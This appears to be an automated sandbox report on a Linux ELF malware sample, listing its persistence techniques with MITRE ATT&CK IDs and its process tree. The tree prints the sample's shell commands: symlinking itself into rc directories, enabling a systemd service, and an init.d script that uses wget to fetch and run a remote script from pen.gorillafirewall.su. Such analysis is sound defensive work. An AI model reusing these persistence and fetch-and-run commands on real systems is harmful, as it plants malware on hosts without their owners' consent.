0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900

RC Scripts

description	ioc	Process
File opened for modification	/etc/init.d/mybinary	0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf
File opened for modification	/etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf	sh

Modifies rc script 2 TTPs 1 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

RC Scripts

persistence privilege_escalation

description	ioc	Process
File opened for modification	/etc/rc.local	0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/etc/systemd/system/custom.service	0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf

Modifies Bash startup script 2 TTPs 1 IoCs

persistence

Boot or Logon Autostart Execution

Unix Shell Configuration Modification

T1546.004

description	ioc	Process
File opened for modification	/etc/profile	0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	/var/iamnewgorilla	2476	0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	mkdir

/tmp/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf
/tmp/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf
1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
PID:2476
- /bin/sh
  sh -c "systemctl enable custom.service >/dev/null 2>&1"
  2⤵
  PID:2478
- - /usr/bin/systemctl
    systemctl enable custom.service
    3⤵
    - Reads runtime system information
    PID:2480
- /bin/sh
  sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
  2⤵
  - File and Directory Permissions Modification
  PID:2618
- - /usr/bin/chmod
    chmod +x /etc/init.d/mybinary
    3⤵
    - File and Directory Permissions Modification
    PID:2619
- /bin/sh
  sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
  2⤵
  PID:2622
- - /usr/bin/ln
    ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
    3⤵
    PID:2623
- /bin/sh
  sh -c "echo \"#!/bin/sh # /etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf case \\\"\$1\\\" in start) echo 'Starting 0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf' /tmp/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf & wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping 0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf' killall 0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf"
  2⤵
  - File and Directory Permissions Modification
  - Modifies init.d
  PID:2624
- /bin/sh
  sh -c "chmod +x /etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf >/dev/null 2>&1"
  2⤵
  - File and Directory Permissions Modification
  PID:2626
- - /usr/bin/chmod
    chmod +x /etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf
    3⤵
    - File and Directory Permissions Modification
    PID:2627
- /bin/sh
  sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
  2⤵
  PID:2628
- - /usr/bin/mkdir
    mkdir -p /etc/rc.d
    3⤵
    - Reads runtime system information
    PID:2629
- /bin/sh
  sh -c "ln -s /etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf /etc/rc.d/S990671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf >/dev/null 2>&1"
  2⤵
  PID:2630
- - /usr/bin/ln
    ln -s /etc/init.d/0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf /etc/rc.d/S990671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900.elf
    3⤵
    PID:2631

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

4

XDG Autostart Entries

T1547.013

Boot or Logon Initialization Scripts

T1037

RC Scripts

Create or Modify System Process

T1543

Systemd Service

T1543.002

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Privilege Escalation

Boot or Logon Autostart Execution

4

XDG Autostart Entries

T1547.013

Boot or Logon Initialization Scripts

T1037

RC Scripts

Create or Modify System Process

T1543

Systemd Service

T1543.002

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

Impair Defenses

Credential Access

Discovery

Network Service Discovery